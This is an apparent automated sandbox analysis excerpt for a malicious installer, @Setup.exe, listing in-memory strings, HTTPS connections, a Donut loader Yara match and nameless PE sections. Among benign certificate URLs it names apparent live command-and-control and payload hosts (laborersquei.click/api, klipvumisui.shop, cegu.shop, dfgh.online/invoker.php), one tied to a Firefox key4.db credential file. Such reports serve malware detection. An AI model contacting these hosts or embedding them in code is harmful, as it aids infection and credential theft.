              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: @Setup.exe, _isdecmp.dll.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: powershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: @Setup.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: @Setup.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000004.00000002.2080022379.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: http://subca.ocsp-certum.com01
              Source: @Setup.exeString found in binary or memory: http://subca.ocsp-certum.com02
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: powershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, @Setup.exe, _isdecmp.dll.9.drString found in binary or memory: http://www.certum.pl/CPS0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000002.2893386099.0000000000BA8000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.2974801805.0000000043F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: http://www.faststone.org/
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: http://www.faststone.org/FSCTutorial.htm
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: http://www.faststone.org/FSCTutorial.htmU
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: http://www.faststone.org/U
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
              Source: powershell.exe, 00000004.00000002.2098749732.00000000089AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.:
              Source: powershell.exe, 00000004.00000002.2097486508.0000000008951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: @Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2080022379.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txth;
              Source: @Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
              Source: powershell.exe, 00000004.00000002.2078394262.0000000003250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCp
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2080022379.00000000057FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org/
              Source: @Setup.exe, 00000000.00000003.2088539007.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000000.2273610331.0000000000EA1000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org0
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop//
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/32
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Comn-
              Source: @Setup.exe, 00000000.00000003.2259753444.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2283852591.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2260343868.00000000009C2000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtH
              Source: @Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
              Source: @Setup.exe, 00000000.00000003.1967303261.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2008196232.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1843769815.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914963153.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1939970763.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1890690968.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982017835.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/
              Source: @Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/&
              Source: @Setup.exe, 00000000.00000002.2287759183.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982326096.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259753444.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259753444.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1967410742.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1939970763.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1843769815.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914811593.0000000003413000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1890690968.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1869507760.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2008196232.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1843769815.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982763831.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1981913248.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1967598985.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914963153.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982017835.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1868435641.00000000033E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api
              Source: @Setup.exe, 00000000.00000003.1939970763.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1967598985.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914963153.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apiB
              Source: @Setup.exe, 00000000.00000003.1981913248.0000000000A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apiK
              Source: @Setup.exe, 00000000.00000003.1940137651.0000000003413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apiT
              Source: @Setup.exe, 00000000.00000003.1869507760.00000000033E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apinp
              Source: @Setup.exe, 00000000.00000003.1890520104.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/dd
              Source: @Setup.exe, 00000000.00000003.2008196232.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982017835.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/v-
              Source: @Setup.exe, 00000000.00000003.1843769815.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click:443/api
              Source: @Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click:443/api.default-release/key4.dbPK
              Source: powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: @Setup.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: @Setup.exe, 00000000.00000003.1844974801.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: @Setup.exe, 00000000.00000003.1844974801.0000000003483000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1845193558.0000000003437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: @Setup.exe, 00000000.00000003.1845193558.0000000003414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: @Setup.exe, 00000000.00000003.1844974801.0000000003483000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1845193558.0000000003437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: @Setup.exe, 00000000.00000003.1845193558.0000000003414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: @Setup.exeString found in binary or memory: https://www.ablebits.com0
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, @Setup.exe, _isdecmp.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
              Source: vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: https://www.faststone.org/order.htm
              Source: vsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drString found in binary or memory: https://www.faststone.org/order.htmU
              Source: @Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000003.2289731109.000000007EB7B000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000000.2298939123.0000000000F61000.00000020.00000001.01000000.00000009.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000008.00000003.2325279792.0000000003323000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000000.2332977821.000000000117D000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.innosetup.com/
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: @Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: NBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000003.2289731109.000000007EB7B000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000000.2298939123.0000000000F61000.00000020.00000001.01000000.00000009.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000008.00000003.2325279792.0000000003323000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000000.2332977821.000000000117D000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: Yara matchFile source: Process Memory Space: vsv_tool.exe PID: 2300, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              PE file has nameless sections
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
              Source: @Setup.exeStatic PE information: section name:
